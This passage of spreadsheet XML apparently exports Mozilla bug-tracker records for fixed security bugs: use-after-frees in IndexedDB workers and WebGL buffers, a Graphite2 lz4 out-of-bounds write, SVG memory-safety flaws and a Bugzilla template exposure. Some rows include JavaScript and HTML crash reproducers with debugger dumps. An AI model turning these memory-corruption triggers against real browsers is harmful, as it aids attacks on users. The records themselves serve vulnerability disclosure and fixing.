          <t>[SECURITY] Block access to templates in extensions/</t>
        </is>
      </c>
      <c r="D2059" t="inlineStr">
        <is>
          <t>2012-08-30 13:49:16 -0700</t>
        </is>
      </c>
      <c r="E2059" t="n">
        <v>1</v>
      </c>
      <c r="F2059" t="n">
        <v>1</v>
      </c>
      <c r="G2059" t="n">
        <v>4</v>
      </c>
      <c r="H2059" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2059" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2059" t="inlineStr">
        <is>
          <t>Extensions</t>
        </is>
      </c>
      <c r="K2059" t="inlineStr">
        <is>
          <t>2.23.2</t>
        </is>
      </c>
      <c r="L2059" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2059" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2059" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2059" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2059" t="inlineStr"/>
      <c r="Q2059" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2059" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2059" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T2059" t="n">
        <v>1</v>
      </c>
      <c r="U2059" t="n">
        <v>0</v>
      </c>
      <c r="V2059" t="n">
        <v>10</v>
      </c>
      <c r="W2059" t="inlineStr">
        <is>
          <t>It's currently possible to browse all extensions from the web, though .pm modules are hidden thanks to bugzilla/.htaccess. But all templates remain visible, including their source code:
https://landfill.bugzilla.org/bugzilla-tip/extensions/Voting/template/en/default/pages/voting/user.html.tmpl
Some custom extensions may contain sensitive data or should simply be outside user's view.
It looks like this code is not doing its job correctly, despite what the comment says:
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/webtools/bugzilla/Bugzilla/Install/Filesystem.pm#209
It looks like that 3.2 and newer are all vulnerable. I will have to check with older versions.</t>
        </is>
      </c>
      <c r="X2059" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2060">
      <c r="A2060" t="n">
        <v>1200004</v>
      </c>
      <c r="B2060" t="inlineStr">
        <is>
          <t>2015-08-30 03:04:04 -0700</t>
        </is>
      </c>
      <c r="C2060" t="inlineStr">
        <is>
          <t>IDB - Use After Free in WorkerPrivate::NotifyFeatures</t>
        </is>
      </c>
      <c r="D2060" t="inlineStr">
        <is>
          <t>2024-05-30 09:05:02 -0700</t>
        </is>
      </c>
      <c r="E2060" t="n">
        <v>1</v>
      </c>
      <c r="F2060" t="n">
        <v>1</v>
      </c>
      <c r="G2060" t="n">
        <v>3</v>
      </c>
      <c r="H2060" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2060" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2060" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K2060" t="inlineStr">
        <is>
          <t>43 Branch</t>
        </is>
      </c>
      <c r="L2060" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2060" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2060" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2060" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2060" t="inlineStr">
        <is>
          <t>[adv-main41+]</t>
        </is>
      </c>
      <c r="Q2060" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2060" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2060" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T2060" t="n">
        <v>1</v>
      </c>
      <c r="U2060" t="n">
        <v>0</v>
      </c>
      <c r="V2060" t="n">
        <v>29</v>
      </c>
      <c r="W2060" t="inlineStr">
        <is>
          <t>Created attachment 8654588
Uaf_IdbNotifyFeatures.js
Use IndexedDB in shared worker can trigger Use After Free in WorkerPrivate::NotifyFeatures.
Reproduction test case (just the shared worker code, for full test case please refer to attachment Uaf_IdbNotifyFeatures.js is attached):
var dbreq0= indexedDB.open("TestDb1",  {version: 2, storage: "persistent"});
close();
if(nonexistvariable!=undefined) {var whatever;};
Steps to reproduce: 
1. Run server side script Uaf_IdbNotifyFeatures.js in Node.js (node Uaf_IdbNotifyFeatures.js).
2. Enter http://localhost:12345 in Firefox browser.
Firefox version: 43.0a1 (2015-08-28)
Full call stack:
(c6c.273c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0806e9b8 ebx=08006c00 ecx=0806e9a8 edx=00000002 esi=08006f0c edi=08006c00
eip=07221f41 esp=084ff3e4 ebp=084ff438 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010203
07221f41 0000            add     byte ptr [eax],al          ds:002b:0806e9b8=60
1:082&gt; !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************
FAULTING_IP: 
unknown!noop+0
07221f41 0000            add     byte ptr [eax],al
EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 07221f41
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000008
   Parameter[1]: 07221f41
Attempt to execute non-executable address 07221f41
CONTEXT:  00000000 -- (.cxr 0x0;r)
eax=0806e9b8 ebx=08006c00 ecx=0806e9a8 edx=00000002 esi=08006f0c edi=08006c00
eip=07221f41 esp=084ff3e4 ebp=084ff438 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010203
07221f41 0000            add     byte ptr [eax],al          ds:002b:0806e9b8=60
FAULTING_THREAD:  0000273c
DEFAULT_BUCKET_ID:  SOFTWARE_NX_FAULT
PROCESS_NAME:  plugin-container.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_PARAMETER1:  00000008
EXCEPTION_PARAMETER2:  07221f41
WRITE_ADDRESS:  07221f41 
FOLLOWUP_IP: 
unknown!noop+0
07221f41 0000            add     byte ptr [eax],al
FAILED_INSTRUCTION_ADDRESS: 
unknown!noop+0
07221f41 0000            add     byte ptr [eax],al
NTGLOBALFLAG:  70
APPLICATION_VERIFIER_FLAGS:  0
APP:  plugin-container.exe
ANALYSIS_VERSION: 6.3.9600.17029 (debuggers(dbg).140219-1702) x86fre
IP_ON_HEAP:  07221f41
The fault address in not in any loaded module, please check your build's rebase
log at &lt;releasedir&gt;\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.
PRIMARY_PROBLEM_CLASS:  SOFTWARE_NX_FAULT
BUGCHECK_STR:  APPLICATION_FAULT_SOFTWARE_NX_FAULT
LAST_CONTROL_TRANSFER:  from 1048618f to 07221f41
STACK_TEXT:  
WARNING: Frame IP not in any known module. Following frames may be wrong.
084ff3e0 1048618f 04b52320 00000004 00000000 0x7221f41
084ff438 100761e7 04b52320 00000004 04b52320 xul!mozilla::dom::workers::WorkerPrivate::NotifyFeatures+0x40fefc
084ff4c0 1021ca8a 04b52320 00000004 084ff5dc xul!mozilla::dom::workers::WorkerPrivate::NotifyInternal+0x7b
084ff4d0 10073700 04b52320 08006c00 076394a0 xul!`anonymous namespace'::NotifyRunnable::WorkerRun+0x11
084ff5dc 100764be 076394a0 08006e8c 07fdc968 xul!mozilla::dom::workers::WorkerRunnable::Run+0x1b0
084ff610 10075bb5 04b52320 0808b000 08097c80 xul!mozilla::dom::workers::WorkerPrivate::ProcessAllControlRunnablesLocked+0xa3
084ff65c 0fcbdb7d 04b52320 00000000 0804ff80 xul!mozilla::dom::workers::WorkerPrivate::DoRunLoop+0xbe
084ff774 10015770 08097c80 07f2d7c0 084ff801 xul!`anonymous namespace'::WorkerThreadPrimaryRunnable::Run+0x109
084ff86c 10016792 0804ff80 084ff801 084ff887 xul!nsThread::ProcessNextEvent+0x72c
084ff888 102440bf 07f2d7c0 07f2d7c0 02c15b70 xul!NS_ProcessNextEvent+0x1a
084ff8ac 10013b35 07f2d7c0 d1888788 0804ff80 xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0xab
084ff8e4 10013bf8 07f2d7c0 00000001 0804ff00 xul!MessageLoop::RunHandler+0x20
084ff904 101a2d9e 776524f0 02c15ac0 02c15b70 xul!MessageLoop::Run+0x19
084ff91c 028c257f 0804ff80 0f78bfb4 07911fc8 xul!nsThread::ThreadFunc+0x8c
084ff938 028c1d04 02c15ac0 084ff97c 0f78c01d nss3!_PR_NativeRunThread+0x8c
084ff944 0f78c01d 02c15ac0 c0408c86 0f78bfb4 nss3!pr_root+0xd
084ff97c 0f78c001 0f78bfb4 084ff99c 77657c04 MSVCR120!_callthreadstartex+0x1b
084ff988 77657c04 07901a68 77657be0 b7a6d8c8 MSVCR120!_threadstartex+0x7c
084ff99c 77dcad1f 07901a68 b7364a4f 00000000 KERNEL32!BaseThreadInitThunk+0x24
084ff9e4 77dcacea ffffffff 77db0228 00000000 ntdll!__RtlUserThreadStart+0x2f
084ff9f4 00000000 0f78bfb4 07901a68 00000000 ntdll!_RtlUserThreadStart+0x1b
STACK_COMMAND:  .cxr 0x0 ; kb
SYMBOL_STACK_INDEX:  0
SYMBOL_NAME:  unknown!noop+0
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: unknown
IMAGE_NAME:  unknown
DEBUG_FLR_IMAGE_TIMESTAMP:  0
FAILURE_BUCKET_ID:  SOFTWARE_NX_FAULT_c0000005_unknown!noop
BUCKET_ID:  APPLICATION_FAULT_SOFTWARE_NX_FAULT_BAD_IP_unknown!noop+0
ANALYSIS_SOURCE:  UM
FAILURE_ID_HASH_STRING:  um:software_nx_fault_c0000005_unknown!noop
FAILURE_ID_HASH:  {ac0d80f2-b5ab-6e06-97ce-8f3501b5f44a}
Followup: MachineOwner
---------</t>
        </is>
      </c>
      <c r="X2060" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2061">
      <c r="A2061" t="n">
        <v>815315</v>
      </c>
      <c r="B2061" t="inlineStr">
        <is>
          <t>2012-11-26 13:13:16 -0800</t>
        </is>
      </c>
      <c r="C2061" t="inlineStr">
        <is>
          <t>nsTableFrame doesn't deal with row-group continuations very well</t>
        </is>
      </c>
      <c r="D2061" t="inlineStr">
        <is>
          <t>2019-08-20 06:49:36 -0700</t>
        </is>
      </c>
      <c r="E2061" t="n">
        <v>1</v>
      </c>
      <c r="F2061" t="n">
        <v>1</v>
      </c>
      <c r="G2061" t="n">
        <v>3</v>
      </c>
      <c r="H2061" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2061" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2061" t="inlineStr">
        <is>
          <t>Layout: Tables</t>
        </is>
      </c>
      <c r="K2061" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2061" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2061" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2061" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2061" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2061" t="inlineStr">
        <is>
          <t>[adv-main20+]</t>
        </is>
      </c>
      <c r="Q2061" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2061" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2061" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T2061" t="n">
        <v>1</v>
      </c>
      <c r="U2061" t="n">
        <v>0</v>
      </c>
      <c r="V2061" t="n">
        <v>15</v>
      </c>
      <c r="W2061" t="inlineStr">
        <is>
          <t>From bug 812879:
ASSERTION: invalid col index: 'Error', file layout/tables/nsTableFrame.cpp
ASSERTION: column frames out of sync with cell map: 'Error', file layout/tables/BasicTableLayoutStrategy.cpp
A related testcase triggers:
ASSERTION: overflow list w/o frames: 'mFrames.NotEmpty()', file layout/generic/nsContainerFrame.cpp
Assertion failure: i &lt; Length() (invalid array index),</t>
        </is>
      </c>
      <c r="X2061" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2062">
      <c r="A2062" t="n">
        <v>1349310</v>
      </c>
      <c r="B2062" t="inlineStr">
        <is>
          <t>2017-03-21 12:14:52 -0700</t>
        </is>
      </c>
      <c r="C2062" t="inlineStr">
        <is>
          <t>Graphite2 lz4::decompress out of bounds write</t>
        </is>
      </c>
      <c r="D2062" t="inlineStr">
        <is>
          <t>2024-05-30 09:30:53 -0700</t>
        </is>
      </c>
      <c r="E2062" t="n">
        <v>1</v>
      </c>
      <c r="F2062" t="n">
        <v>1</v>
      </c>
      <c r="G2062" t="n">
        <v>3</v>
      </c>
      <c r="H2062" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2062" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2062" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K2062" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2062" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2062" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2062" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2062" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2062" t="inlineStr">
        <is>
          <t>[gfx-noted][post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q2062" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2062" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2062" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T2062" t="n">
        <v>1</v>
      </c>
      <c r="U2062" t="n">
        <v>0</v>
      </c>
      <c r="V2062" t="n">
        <v>24</v>
      </c>
      <c r="W2062" t="inlineStr">
        <is>
          <t>Created attachment 8849662
grlz432bit.poc.zip
On 32 bit systems an out of bounds write read/write can occur during the decompressing of a lz4 compressed graphite font table.
valgrind log (with gr2fonttest tool):
Invalid read of size 16
   at 0x4048550: lz4::decompress(void const*, unsigned int, void*, unsigned int) (in /src/libgraphite2.so.3.0.1)
 Address 0x685218d is 16,843,109 bytes inside a block of size 16,843,117 alloc'd
   at 0x402D17C: malloc 
   by 0x4049567: graphite2::Face::Table::decompress() (in /src/libgraphite2.so.3.0.1)
Invalid read of size 16
   at 0x4048555: lz4::decompress(void const*, unsigned int, void*, unsigned int) (in /src/libgraphite2.so.3.0.1)
 Address 0x685219d is 8 bytes after a block of size 16,843,117 alloc'd
   at 0x402D17C: malloc 
   by 0x4049567: graphite2::Face::Table::decompress() (in /src/libgraphite2.so.3.0.1)
Invalid write of size 8
   at 0x404855A: lz4::decompress(void const*, unsigned int, void*, unsigned int) (in /src/libgraphite2.so.3.0.1)
 Address 0x6852195 is 0 bytes after a block of size 16,843,117 alloc'd
   at 0x402D17C: malloc 
   by 0x4049567: graphite2::Face::Table::decompress() (in /src/libgraphite2.so.3.0.1)
Invalid write of size 8
   at 0x404855E: lz4::decompress(void const*, unsigned int, void*, unsigned int) (in /src/libgraphite2.so.3.0.1)
 Address 0x685219d is 8 bytes after a block of size 16,843,117 alloc'd
   at 0x402D17C: malloc 
   by 0x4049567: graphite2::Face::Table::decompress() (in /src/libgraphite2.so.3.0.1)
Invalid read of size 16
   at 0x4048567: lz4::decompress(void const*, unsigned int, void*, unsigned int) (in /src/libgraphite2.so.3.0.1)
 Address 0x68521ad is 16,843,141 bytes inside a block of size 16,846,784 in arena "client"</t>
        </is>
      </c>
      <c r="X2062" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2063">
      <c r="A2063" t="n">
        <v>1204061</v>
      </c>
      <c r="B2063" t="inlineStr">
        <is>
          <t>2015-09-11 11:07:39 -0700</t>
        </is>
      </c>
      <c r="C2063" t="inlineStr">
        <is>
          <t>Missing status checks in AddWeightedPathSegLists and SVGPathSegListSMILType::Interpolate cause memory-safety bugs</t>
        </is>
      </c>
      <c r="D2063" t="inlineStr">
        <is>
          <t>2024-05-30 09:05:31 -0700</t>
        </is>
      </c>
      <c r="E2063" t="n">
        <v>1</v>
      </c>
      <c r="F2063" t="n">
        <v>1</v>
      </c>
      <c r="G2063" t="n">
        <v>3</v>
      </c>
      <c r="H2063" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2063" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2063" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K2063" t="inlineStr">
        <is>
          <t>40 Branch</t>
        </is>
      </c>
      <c r="L2063" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2063" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2063" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2063" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2063" t="inlineStr">
        <is>
          <t>[b2g-adv-main-2.5+][post-critsmash-triage[adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q2063" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2063" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2063" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T2063" t="n">
        <v>1</v>
      </c>
      <c r="U2063" t="n">
        <v>0</v>
      </c>
      <c r="V2063" t="n">
        <v>31</v>
      </c>
      <c r="W2063" t="inlineStr">
        <is>
          <t>AddWeightedPathSegLists (dom\svg\SVGPathSegListSMILType.cpp) calls SetLength on a FallibleTArray without checking the result in release builds. If FF is almost out of memory for some other reason and/or a page includes code that invokes this function with an SVG path with an unusually-large number of segments, SetLength could invisibly fail. AddWeightedPathSegLists would then overwrite memory that it doesn't own.
There is also a similar bug in SVGPathSegListSMILType::Interpolate in the same module.
The bugs are latent because the functions in which they occur don't seem to be called by anything in the codebase (please verify).
Details:
--------
The bug in AddWeightedPathSegLists is in lines 267-68: The assert message on line 268 is misleading...
236:static void
237:AddWeightedPathSegLists(double aCoeff1, const SVGPathDataAndInfo&amp; aList1,
238:                        double aCoeff2, const SVGPathDataAndInfo&amp; aList2,
239:                        SVGPathDataAndInfo&amp; aResult)
...
266:  if (aResult.IsIdentity()) {
267:    DebugOnly&lt;bool&gt; success = aResult.SetLength(aList2.Length());
268:    MOZ_ASSERT(success, "infallible nsTArray::SetLength should succeed");
269:    aResult.SetElement(aList2.Element()); // propagate target element info!
270:  }
271:
272:  SVGPathDataAndInfo::iterator resultIter = aResult.begin();
273:
274:  while ((!iter1 || iter1 != end1) &amp;&amp;
275:         iter2 != end2) {
276:    AddWeightedPathSegs(aCoeff1, iter1,
277:                        aCoeff2, iter2,
278:                        resultIter);
...because SVGPathDataAndInfo::SetLength actually resizes a FallibleTArray (dom\svg\SVGPathData.h):
239: class SVGPathDataAndInfo final : public SVGPathData
240: {
...
283:  using SVGPathData::SetLength;
284:  using SVGPathData::begin;
...
293: };
76: class SVGPathData
77: {
...
204:  bool SetLength(uint32_t aLength) {
205:    return mData.SetLength(aLength);
206:  }
...
224:  iterator begin() { return mData.Elements(); }
...
227:  FallibleTArray&lt;float&gt; mData;
228:};
So if SetLength fails, SVGPathSegListSMILType.cpp line 272 derives an iterator to memory that it has no right to use, and the function call on lines 276-78 writes into that memory.
This bug is still present in 9/10/2015's Aurora (http://hg.mozilla.org/releases/mozilla-aurora/file/136110a23c39/dom/svg/SVGPathSegListSMILType.cpp , http://hg.mozilla.org/releases/mozilla-aurora/file/136110a23c39/dom/svg/SVGPathData.h ).</t>
        </is>
      </c>
      <c r="X2063" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2064">
      <c r="A2064" t="n">
        <v>799907</v>
      </c>
      <c r="B2064" t="inlineStr">
        <is>
          <t>2012-10-10 05:06:37 -0700</t>
        </is>
      </c>
      <c r="C2064" t="inlineStr">
        <is>
          <t>IonMonkey: Assertion failure: mir-&gt;type() == MIRType_Value, at ../ion/shared/Lowering-shared-inl.h:413 or Crash [@ js::ion::LinearScanAllocator::populateSafepoints]</t>
        </is>
      </c>
      <c r="D2064" t="inlineStr">
        <is>
          <t>2013-11-25 13:20:08 -0800</t>
        </is>
      </c>
      <c r="E2064" t="n">
        <v>1</v>
      </c>
      <c r="F2064" t="n">
        <v>1</v>
      </c>
      <c r="G2064" t="n">
        <v>3</v>
      </c>
      <c r="H2064" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2064" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2064" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2064" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2064" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2064" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2064" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2064" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2064" t="inlineStr">
        <is>
          <t>[jsbugmon:update][ion:p1][adv-main19+]</t>
        </is>
      </c>
      <c r="Q2064" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2064" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2064" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T2064" t="n">
        <v>1</v>
      </c>
      <c r="U2064" t="n">
        <v>0</v>
      </c>
      <c r="V2064" t="n">
        <v>12</v>
      </c>
      <c r="W2064" t="inlineStr">
        <is>
          <t>Created attachment 669924
Testcase for shell
The attached testcase asserts on mozilla-central revision ec10630b1a54 (run with --ion-eager).</t>
        </is>
      </c>
      <c r="X2064" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2065">
      <c r="A2065" t="n">
        <v>1325511</v>
      </c>
      <c r="B2065" t="inlineStr">
        <is>
          <t>2016-12-22 16:52:52 -0800</t>
        </is>
      </c>
      <c r="C2065" t="inlineStr">
        <is>
          <t>libGLES - Use After Free in Buffer11::updateBufferStorage()</t>
        </is>
      </c>
      <c r="D2065" t="inlineStr">
        <is>
          <t>2024-05-30 09:24:21 -0700</t>
        </is>
      </c>
      <c r="E2065" t="n">
        <v>1</v>
      </c>
      <c r="F2065" t="n">
        <v>1</v>
      </c>
      <c r="G2065" t="n">
        <v>3</v>
      </c>
      <c r="H2065" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2065" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2065" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K2065" t="inlineStr">
        <is>
          <t>53 Branch</t>
        </is>
      </c>
      <c r="L2065" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2065" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N2065" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2065" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2065" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main52+]</t>
        </is>
      </c>
      <c r="Q2065" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2065" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2065" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T2065" t="n">
        <v>1</v>
      </c>
      <c r="U2065" t="n">
        <v>0</v>
      </c>
      <c r="V2065" t="n">
        <v>49</v>
      </c>
      <c r="W2065" t="inlineStr">
        <is>
          <t>Created attachment 8821380
UAF_updateBufferStorage_Repro.html
Reproduction test case:
	&lt;html&gt;&lt;body &gt;&lt;canvas id="test"&gt;&lt;/canvas&gt;&lt;/body&gt;&lt;script&gt;
	var canvas0=document.getElementById("test");
	var gl = canvas0.getContext("webgl2");
	var buffer0= gl.createBuffer();
	gl.bindBuffer(gl.UNIFORM_BUFFER, buffer0); 
	gl.bindBuffer(gl.ARRAY_BUFFER, buffer0); 
	var myImage = new Image();myImage.src = "non.jpg";myImage.onerror = function(){ canvas0.width = "418";} 
	var observer0 =new MutationObserver(function listener1(event) {
	if( typeof listener1.counter == "undefined"){listener1.counter = 0;}
	if(listener1.counter &gt; 3) return;
	listener1.counter++;
	var vertices  = [ 1.0,  1.0,  0.0,  -1.0, 1.0,  0.0,  1.0,  -1.0, 0.0, -1.0, -1.0, 0.0]; 
	gl.bufferData(gl.ARRAY_BUFFER, new Float32Array(vertices), gl.STATIC_DRAW);; 
	canvas0.width = "418";
	gl.bufferData(gl.UNIFORM_BUFFER, 2626,gl.STATIC_COPY); 
	}); observer0.observe(canvas0, {attributes: true});
	var timeout0 = setTimeout(function(){  gl.bufferData(gl.ARRAY_BUFFER, 2167,gl.STREAM_DRAW); }, 74);
	&lt;/script&gt;&lt;/html&gt;
Steps to reproduce: 
	1. Open the test case UAF_updateBufferStorage_Repro.html in Firefox browser.
Firefox version: 53.0a1 (2016-12-22) (32-bit)
OS: Windows 10
Stack trace:
	(615c.6088): Access violation - code c0000005 (!!! second chance !!!)
	eax=e5e5e5e5 ebx=11ab9280 ecx=11ab9280 edx=0dc8ba00 esi=11afc280 edi=11afc280
	eip=65181b4d esp=010fdea4 ebp=010fded8 iopl=0         nv up ei pl zr na pe nc
	cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
	libGLESv2!rx::Buffer11::updateBufferStorage+0xdb:
	65181b4d ff5008          call    dword ptr [eax+8]    ds:002b:e5e5e5ed=????????
	2:059&gt; !analyze -v
	*******************************************************************************
	*                                                                             *
	*                        Exception Analysis                                   *
	*                                                                             *
	*******************************************************************************
	FAULTING_IP: 
	libGLESv2!rx::Buffer11::updateBufferStorage+db [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\buffer11.cpp @ 807]
	65181b4d ff5008          call    dword ptr [eax+8]
	EXCEPTION_RECORD:  (.exr -1)
	ExceptionAddress: 65181b4d (libGLESv2!rx::Buffer11::updateBufferStorage+0x000000db)
	   ExceptionCode: c0000005 (Access violation)
	  ExceptionFlags: 00000000
	NumberParameters: 2
	   Parameter[0]: 00000000
	   Parameter[1]: e5e5e5ed
	Attempt to read from address e5e5e5ed
	FAULTING_THREAD:  00006088
	PROCESS_NAME:  firefox.exe
	ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
	EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
	EXCEPTION_PARAMETER1:  00000000
	EXCEPTION_PARAMETER2:  e5e5e5ed
	READ_ADDRESS:  e5e5e5ed 
	FOLLOWUP_IP: 
	libGLESv2!rx::Buffer11::updateBufferStorage+db [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\gfx\angle\src\libangle\renderer\d3d\d3d11\buffer11.cpp @ 807]
	65181b4d ff5008          call    dword ptr [eax+8]
	NTGLOBALFLAG:  400
	APPLICATION_VERIFIER_FLAGS:  0
	APP:  firefox.exe
	ANALYSIS_VERSION: 10.0.10240.9 x86fre
	BUGCHECK_STR:  INVALID_POINTER_READ_IN_CALL
	DEFAULT_BUCKET_ID:  INVALID_POINTER_READ_IN_CALL
	LAST_CONTROL_TRANSFER:  from 6518175f to 65181b4d
	STACK_TEXT:  
	010fded8 6518175f 010fdefc 11ab9280 00000000 libGLESv2!rx::Buffer11::updateBufferStorage+0xdb
	010fdf08 65180d5c 010fdf20 00000000 1189ac40 libGLESv2!rx::Buffer11::getBufferStorage+0x85
	010fdf34 65180e2e 010fdf50 00000000 1189ac40 libGLESv2!rx::Buffer11::getSystemMemoryStorage+0x13
	010fdf64 65180cad 010fdf88 00008892 1159b000 libGLESv2!rx::Buffer11::setSubData+0x94
	010fdf94 65213ca0 010fdfbc 00008892 1159b000 libGLESv2!rx::Buffer11::setData+0x29
	010fdfd4 6514a85d 00008892 00000877 1159b000 libGLESv2!gl::Context::bufferData+0x34
	010fdff0 67e716e5 00008892 00000877 1159b000 libGLESv2!gl::BufferData+0x40
	010fe010 682c7787 00008892 00000877 1159b000 xul!mozilla::gl::GLContext::fBufferData+0x1a
	010fe070 682ce0fd 00008892 00000877 1159b000 xul!mozilla::WebGLBuffer::BufferData+0xc3
